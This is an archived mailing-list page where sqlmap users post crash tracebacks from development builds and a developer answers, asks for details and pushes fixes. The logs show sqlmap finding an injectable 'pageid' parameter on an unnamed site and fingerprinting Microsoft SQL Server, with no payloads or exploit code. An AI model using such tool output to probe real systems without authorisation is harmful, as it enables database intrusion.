sqlmap-users Mailing List for sqlmap (Page 115)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: ultramegaman <sec...@ul...> - 2010-12-15 19:51:18
|
[11:26:50] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the command line, the following
text and any information needed to reproduce the bug. The developers
will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9-dev (r2693)
Python version: 2.6.5
Operating system: posix
Traceback (most recent call last):
File "./sqlmap.py", line 79, in main
start()
File "/data/ultra/tools/sqlmap-dev/lib/controller/controller.py",
line 393, in start
action()
File "/data/ultra/tools/sqlmap-dev/lib/controller/action.py", line
77, in action
conf.dumper.users(conf.dbmsHandler.getUsers())
File "/data/ultra/tools/sqlmap-dev/plugins/generic/enumeration.py",
line 150, in getUsers
value = inject.getValue(query, blind=False, error=False)
File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 416,
in getValue
value = __goInband(query, expected, sort, resumeValue, unpack, dump)
File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 375,
in __goInband
data = parseUnionPage(output, expression, partial, condition, sort)
NameError: global name 'condition' is not defined
Please let me know if more information is required.
|
|
From: Andreas C. (MegaHz) <me...@me...> - 2010-12-15 12:46:42
|
yeap no error now
thanks man
On 15,Dec 2010, at 2:09 PM, Miroslav Stampar wrote:
> It was a bad fix. Please try it now.
>
> KR
>
> On Wed, Dec 15, 2010 at 12:35 PM, Miroslav Stampar
> <mir...@gm...> wrote:
>> hi.
>>
>> could you please try it now? we've made huge code updates lately, and
>> there is still some more to do - to be more precise, we need to adapt
>> new "injection data structure" we use now in every possible case.
>>
>> kr
>>
>> On Wed, Dec 15, 2010 at 11:34 AM, Andreas Constantinides (MegaHz)
>> <me...@me...> wrote:
>>> great, thanks man
>>>
>>>
>>> -- Andreas
>>>
>>>
>>> On 15,Dec 2010, at 12:32 PM, Miroslav Stampar wrote:
>>>
>>>> Hi Andreas.
>>>>
>>>> We've spotted the problem this second. We'll try to fix it ASAP.
>>>>
>>>> KR
>>>>
>>>> On Wed, Dec 15, 2010 at 11:26 AM, Miroslav Stampar
>>>> <mir...@gm...> wrote:
>>>>> Hi Andreas.
>>>>>
>>>>> Sorry, we can't reproduce the error :), but we are eager to find that one.
>>>>>
>>>>> Which switches did you use? Was it a result of a "resumed" session (or
>>>>> to rephrase, can you reproduce it with --flush-session)?
>>>>>
>>>>> KR
>>>>>
>>>>> On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
>>>>> <me...@me...> wrote:
>>>>>> hi guys,
>>>>>> i got the following error:
>>>>>>
>>>>>> there were multiple injection points, please select the one to use for
>>>>>> following injections:
>>>>>>
>>>>>> tem, type: LIKE double quoted string (default)
>>>>>>
>>>>>> [1] place: GET, parameter: pageid, type: Double quoted string
>>>>>>
>>>>>> [q] Quit
>>>>>>
>>>>>>> 1
>>>>>>
>>>>>> [00:56:46] [INFO] testing Microsoft SQL Server
>>>>>>
>>>>>> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>>>>>> with the latest development version from the Subversion repository. If the
>>>>>> exception persists, please send by e-mail to
>>>>>> sql...@li... the command line, the following text and
>>>>>> any information needed to reproduce the bug. The developers will try to
>>>>>> reproduce the bug, fix it accordingly and get back to you.
>>>>>>
>>>>>> sqlmap version: 0.9-dev (r2684)
>>>>>>
>>>>>> Python version: 2.6.1
>>>>>>
>>>>>> Operating system: posix
>>>>>>
>>>>>> Traceback (most recent call last):
>>>>>>
>>>>>> File "./sqlmap.py", line 79, in main
>>>>>>
>>>>>> start()
>>>>>>
>>>>>> File
>>>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
>>>>>> line 412, in start
>>>>>>
>>>>>> action()
>>>>>>
>>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
>>>>>> line 32, in action
>>>>>>
>>>>>> setHandler()
>>>>>>
>>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
>>>>>> line 105, in setHandler
>>>>>>
>>>>>> if handler.checkDbms():
>>>>>>
>>>>>> File
>>>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
>>>>>> line 95, in checkDbms
>>>>>>
>>>>>> result =
>>>>>> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
>>>>>> (randInt, randInt))
>>>>>>
>>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>>> line 506, in checkBooleanExpression
>>>>>>
>>>>>> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
>>>>>> suppressOutput=True, expectingNone=expectingNone)
>>>>>>
>>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>>> line 457, in getValue
>>>>>>
>>>>>> value = __goBooleanProxy(booleanExpression, resumeValue)
>>>>>>
>>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>>> line 100, in __goBooleanProxy
>>>>>>
>>>>>> kb.pageTemplate =
>>>>>> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
>>>>>> kb.injection.place)
>>>>>>
>>>>>> KeyError: 5
>>>>>>
>>>>>> [*] shutting down at: 00:56:46
>>>>>>
>>>>>> with the latest svn, any ideas?
>>>>>>
>>>>>> thanks
>>>>>>
>>>>>> -- Andreas
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Lotusphere 2011
>>>>>> Register now for Lotusphere 2011 and learn how
>>>>>> to connect the dots, take your collaborative environment
>>>>>> to the next level, and enter the era of Social Business.
>>>>>> http://p.sf.net/sfu/lotusphere-d2d
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>>
>>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>>> Mobile: +385921010204 (HR 0921010204)
>>>>> PGP Key ID: 0xB5397B1B
>>>>> Location: Zagreb, Croatia
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-15 12:10:05
|
It was a bad fix. Please try it now.
KR
On Wed, Dec 15, 2010 at 12:35 PM, Miroslav Stampar
<mir...@gm...> wrote:
> hi.
>
> could you please try it now? we've made huge code updates lately, and
> there is still some more to do - to be more precise, we need to adapt
> new "injection data structure" we use now in every possible case.
>
> kr
>
> On Wed, Dec 15, 2010 at 11:34 AM, Andreas Constantinides (MegaHz)
> <me...@me...> wrote:
>> great, thanks man
>>
>>
>> -- Andreas
>>
>>
>> On 15,Dec 2010, at 12:32 PM, Miroslav Stampar wrote:
>>
>>> Hi Andreas.
>>>
>>> We've spotted the problem this second. We'll try to fix it ASAP.
>>>
>>> KR
>>>
>>> On Wed, Dec 15, 2010 at 11:26 AM, Miroslav Stampar
>>> <mir...@gm...> wrote:
>>>> Hi Andreas.
>>>>
>>>> Sorry, we can't reproduce the error :), but we are eager to find that one.
>>>>
>>>> Which switches did you use? Was it a result of a "resumed" session (or
>>>> to rephrase, can you reproduce it with --flush-session)?
>>>>
>>>> KR
>>>>
>>>> On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
>>>> <me...@me...> wrote:
>>>>> hi guys,
>>>>> i got the following error:
>>>>>
>>>>> there were multiple injection points, please select the one to use for
>>>>> following injections:
>>>>>
>>>>> tem, type: LIKE double quoted string (default)
>>>>>
>>>>> [1] place: GET, parameter: pageid, type: Double quoted string
>>>>>
>>>>> [q] Quit
>>>>>
>>>>>> 1
>>>>>
>>>>> [00:56:46] [INFO] testing Microsoft SQL Server
>>>>>
>>>>> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>>>>> with the latest development version from the Subversion repository. If the
>>>>> exception persists, please send by e-mail to
>>>>> sql...@li... the command line, the following text and
>>>>> any information needed to reproduce the bug. The developers will try to
>>>>> reproduce the bug, fix it accordingly and get back to you.
>>>>>
>>>>> sqlmap version: 0.9-dev (r2684)
>>>>>
>>>>> Python version: 2.6.1
>>>>>
>>>>> Operating system: posix
>>>>>
>>>>> Traceback (most recent call last):
>>>>>
>>>>> File "./sqlmap.py", line 79, in main
>>>>>
>>>>> start()
>>>>>
>>>>> File
>>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
>>>>> line 412, in start
>>>>>
>>>>> action()
>>>>>
>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
>>>>> line 32, in action
>>>>>
>>>>> setHandler()
>>>>>
>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
>>>>> line 105, in setHandler
>>>>>
>>>>> if handler.checkDbms():
>>>>>
>>>>> File
>>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
>>>>> line 95, in checkDbms
>>>>>
>>>>> result =
>>>>> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
>>>>> (randInt, randInt))
>>>>>
>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>> line 506, in checkBooleanExpression
>>>>>
>>>>> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
>>>>> suppressOutput=True, expectingNone=expectingNone)
>>>>>
>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>> line 457, in getValue
>>>>>
>>>>> value = __goBooleanProxy(booleanExpression, resumeValue)
>>>>>
>>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>>> line 100, in __goBooleanProxy
>>>>>
>>>>> kb.pageTemplate =
>>>>> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
>>>>> kb.injection.place)
>>>>>
>>>>> KeyError: 5
>>>>>
>>>>> [*] shutting down at: 00:56:46
>>>>>
>>>>> with the latest svn, any ideas?
>>>>>
>>>>> thanks
>>>>>
>>>>> -- Andreas
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Lotusphere 2011
>>>>> Register now for Lotusphere 2011 and learn how
>>>>> to connect the dots, take your collaborative environment
>>>>> to the next level, and enter the era of Social Business.
>>>>> http://p.sf.net/sfu/lotusphere-d2d
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>>
>>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>>> Mobile: +385921010204 (HR 0921010204)
>>>> PGP Key ID: 0xB5397B1B
>>>> Location: Zagreb, Croatia
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-15 11:35:32
|
hi.
could you please try it now? we've made huge code updates lately, and
there is still some more to do - to be more precise, we need to adapt
new "injection data structure" we use now in every possible case.
kr
On Wed, Dec 15, 2010 at 11:34 AM, Andreas Constantinides (MegaHz)
<me...@me...> wrote:
> great, thanks man
>
>
> -- Andreas
>
>
> On 15,Dec 2010, at 12:32 PM, Miroslav Stampar wrote:
>
>> Hi Andreas.
>>
>> We've spotted the problem this second. We'll try to fix it ASAP.
>>
>> KR
>>
>> On Wed, Dec 15, 2010 at 11:26 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>>> Hi Andreas.
>>>
>>> Sorry, we can't reproduce the error :), but we are eager to find that one.
>>>
>>> Which switches did you use? Was it a result of a "resumed" session (or
>>> to rephrase, can you reproduce it with --flush-session)?
>>>
>>> KR
>>>
>>> On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
>>> <me...@me...> wrote:
>>>> hi guys,
>>>> i got the following error:
>>>>
>>>> there were multiple injection points, please select the one to use for
>>>> following injections:
>>>>
>>>> tem, type: LIKE double quoted string (default)
>>>>
>>>> [1] place: GET, parameter: pageid, type: Double quoted string
>>>>
>>>> [q] Quit
>>>>
>>>>> 1
>>>>
>>>> [00:56:46] [INFO] testing Microsoft SQL Server
>>>>
>>>> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>>>> with the latest development version from the Subversion repository. If the
>>>> exception persists, please send by e-mail to
>>>> sql...@li... the command line, the following text and
>>>> any information needed to reproduce the bug. The developers will try to
>>>> reproduce the bug, fix it accordingly and get back to you.
>>>>
>>>> sqlmap version: 0.9-dev (r2684)
>>>>
>>>> Python version: 2.6.1
>>>>
>>>> Operating system: posix
>>>>
>>>> Traceback (most recent call last):
>>>>
>>>> File "./sqlmap.py", line 79, in main
>>>>
>>>> start()
>>>>
>>>> File
>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
>>>> line 412, in start
>>>>
>>>> action()
>>>>
>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
>>>> line 32, in action
>>>>
>>>> setHandler()
>>>>
>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
>>>> line 105, in setHandler
>>>>
>>>> if handler.checkDbms():
>>>>
>>>> File
>>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
>>>> line 95, in checkDbms
>>>>
>>>> result =
>>>> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
>>>> (randInt, randInt))
>>>>
>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>> line 506, in checkBooleanExpression
>>>>
>>>> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
>>>> suppressOutput=True, expectingNone=expectingNone)
>>>>
>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>> line 457, in getValue
>>>>
>>>> value = __goBooleanProxy(booleanExpression, resumeValue)
>>>>
>>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>>> line 100, in __goBooleanProxy
>>>>
>>>> kb.pageTemplate =
>>>> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
>>>> kb.injection.place)
>>>>
>>>> KeyError: 5
>>>>
>>>> [*] shutting down at: 00:56:46
>>>>
>>>> with the latest svn, any ideas?
>>>>
>>>> thanks
>>>>
>>>> -- Andreas
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Lotusphere 2011
>>>> Register now for Lotusphere 2011 and learn how
>>>> to connect the dots, take your collaborative environment
>>>> to the next level, and enter the era of Social Business.
>>>> http://p.sf.net/sfu/lotusphere-d2d
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>>
>>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>>> Mobile: +385921010204 (HR 0921010204)
>>> PGP Key ID: 0xB5397B1B
>>> Location: Zagreb, Croatia
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>>
>
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Andreas C. (MegaHz) <me...@me...> - 2010-12-15 10:35:05
|
great, thanks man
-- Andreas
On 15,Dec 2010, at 12:32 PM, Miroslav Stampar wrote:
> Hi Andreas.
>
> We've spotted the problem this second. We'll try to fix it ASAP.
>
> KR
>
> On Wed, Dec 15, 2010 at 11:26 AM, Miroslav Stampar
> <mir...@gm...> wrote:
>> Hi Andreas.
>>
>> Sorry, we can't reproduce the error :), but we are eager to find that one.
>>
>> Which switches did you use? Was it a result of a "resumed" session (or
>> to rephrase, can you reproduce it with --flush-session)?
>>
>> KR
>>
>> On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
>> <me...@me...> wrote:
>>> hi guys,
>>> i got the following error:
>>>
>>> there were multiple injection points, please select the one to use for
>>> following injections:
>>>
>>> tem, type: LIKE double quoted string (default)
>>>
>>> [1] place: GET, parameter: pageid, type: Double quoted string
>>>
>>> [q] Quit
>>>
>>>> 1
>>>
>>> [00:56:46] [INFO] testing Microsoft SQL Server
>>>
>>> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>>> with the latest development version from the Subversion repository. If the
>>> exception persists, please send by e-mail to
>>> sql...@li... the command line, the following text and
>>> any information needed to reproduce the bug. The developers will try to
>>> reproduce the bug, fix it accordingly and get back to you.
>>>
>>> sqlmap version: 0.9-dev (r2684)
>>>
>>> Python version: 2.6.1
>>>
>>> Operating system: posix
>>>
>>> Traceback (most recent call last):
>>>
>>> File "./sqlmap.py", line 79, in main
>>>
>>> start()
>>>
>>> File
>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
>>> line 412, in start
>>>
>>> action()
>>>
>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
>>> line 32, in action
>>>
>>> setHandler()
>>>
>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
>>> line 105, in setHandler
>>>
>>> if handler.checkDbms():
>>>
>>> File
>>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
>>> line 95, in checkDbms
>>>
>>> result =
>>> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
>>> (randInt, randInt))
>>>
>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>> line 506, in checkBooleanExpression
>>>
>>> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
>>> suppressOutput=True, expectingNone=expectingNone)
>>>
>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>> line 457, in getValue
>>>
>>> value = __goBooleanProxy(booleanExpression, resumeValue)
>>>
>>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>>> line 100, in __goBooleanProxy
>>>
>>> kb.pageTemplate =
>>> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
>>> kb.injection.place)
>>>
>>> KeyError: 5
>>>
>>> [*] shutting down at: 00:56:46
>>>
>>> with the latest svn, any ideas?
>>>
>>> thanks
>>>
>>> -- Andreas
>>>
>>> ------------------------------------------------------------------------------
>>> Lotusphere 2011
>>> Register now for Lotusphere 2011 and learn how
>>> to connect the dots, take your collaborative environment
>>> to the next level, and enter the era of Social Business.
>>> http://p.sf.net/sfu/lotusphere-d2d
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>>
>> E-mail / Jabber: miroslav.stampar (at) gmail.com
>> Mobile: +385921010204 (HR 0921010204)
>> PGP Key ID: 0xB5397B1B
>> Location: Zagreb, Croatia
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-15 10:32:16
|
Hi Andreas.
We've spotted the problem this second. We'll try to fix it ASAP.
KR
On Wed, Dec 15, 2010 at 11:26 AM, Miroslav Stampar
<mir...@gm...> wrote:
> Hi Andreas.
>
> Sorry, we can't reproduce the error :), but we are eager to find that one.
>
> Which switches did you use? Was it a result of a "resumed" session (or
> to rephrase, can you reproduce it with --flush-session)?
>
> KR
>
> On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
> <me...@me...> wrote:
>> hi guys,
>> i got the following error:
>>
>> there were multiple injection points, please select the one to use for
>> following injections:
>>
>> tem, type: LIKE double quoted string (default)
>>
>> [1] place: GET, parameter: pageid, type: Double quoted string
>>
>> [q] Quit
>>
>>> 1
>>
>> [00:56:46] [INFO] testing Microsoft SQL Server
>>
>> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>> with the latest development version from the Subversion repository. If the
>> exception persists, please send by e-mail to
>> sql...@li... the command line, the following text and
>> any information needed to reproduce the bug. The developers will try to
>> reproduce the bug, fix it accordingly and get back to you.
>>
>> sqlmap version: 0.9-dev (r2684)
>>
>> Python version: 2.6.1
>>
>> Operating system: posix
>>
>> Traceback (most recent call last):
>>
>> File "./sqlmap.py", line 79, in main
>>
>> start()
>>
>> File
>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
>> line 412, in start
>>
>> action()
>>
>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
>> line 32, in action
>>
>> setHandler()
>>
>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
>> line 105, in setHandler
>>
>> if handler.checkDbms():
>>
>> File
>> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
>> line 95, in checkDbms
>>
>> result =
>> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
>> (randInt, randInt))
>>
>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>> line 506, in checkBooleanExpression
>>
>> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
>> suppressOutput=True, expectingNone=expectingNone)
>>
>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>> line 457, in getValue
>>
>> value = __goBooleanProxy(booleanExpression, resumeValue)
>>
>> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
>> line 100, in __goBooleanProxy
>>
>> kb.pageTemplate =
>> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
>> kb.injection.place)
>>
>> KeyError: 5
>>
>> [*] shutting down at: 00:56:46
>>
>> with the latest svn, any ideas?
>>
>> thanks
>>
>> -- Andreas
>>
>> ------------------------------------------------------------------------------
>> Lotusphere 2011
>> Register now for Lotusphere 2011 and learn how
>> to connect the dots, take your collaborative environment
>> to the next level, and enter the era of Social Business.
>> http://p.sf.net/sfu/lotusphere-d2d
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
|
From: Miroslav S. <mir...@gm...> - 2010-12-15 10:26:23
|
Hi Andreas.
Sorry, we can't reproduce the error :), but we are eager to find that one.
Which switches did you use? Was it a result of a "resumed" session (or
to rephrase, can you reproduce it with --flush-session)?
KR
On Wed, Dec 15, 2010 at 12:02 AM, Andreas Constantinides (MegaHz)
<me...@me...> wrote:
> hi guys,
> i got the following error:
>
> there were multiple injection points, please select the one to use for
> following injections:
>
> tem, type: LIKE double quoted string (default)
>
> [1] place: GET, parameter: pageid, type: Double quoted string
>
> [q] Quit
>
>> 1
>
> [00:56:46] [INFO] testing Microsoft SQL Server
>
> [00:56:46] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text and
> any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
>
> sqlmap version: 0.9-dev (r2684)
>
> Python version: 2.6.1
>
> Operating system: posix
>
> Traceback (most recent call last):
>
> File "./sqlmap.py", line 79, in main
>
> start()
>
> File
> "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/controller.py",
> line 412, in start
>
> action()
>
> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/action.py",
> line 32, in action
>
> setHandler()
>
> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/controller/handler.py",
> line 105, in setHandler
>
> if handler.checkDbms():
>
> File
> "/Users/MegaHz/Downloads/tools/sqlmap-dev/plugins/dbms/mssqlserver/fingerprint.py",
> line 95, in checkDbms
>
> result =
> inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" %
> (randInt, randInt))
>
> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
> line 506, in checkBooleanExpression
>
> return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL,
> suppressOutput=True, expectingNone=expectingNone)
>
> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
> line 457, in getValue
>
> value = __goBooleanProxy(booleanExpression, resumeValue)
>
> File "/Users/MegaHz/Downloads/tools/sqlmap-dev/lib/request/inject.py",
> line 100, in __goBooleanProxy
>
> kb.pageTemplate =
> getPageTemplate(kb.injection.data[kb.technique].templatePayload,
> kb.injection.place)
>
> KeyError: 5
>
> [*] shutting down at: 00:56:46
>
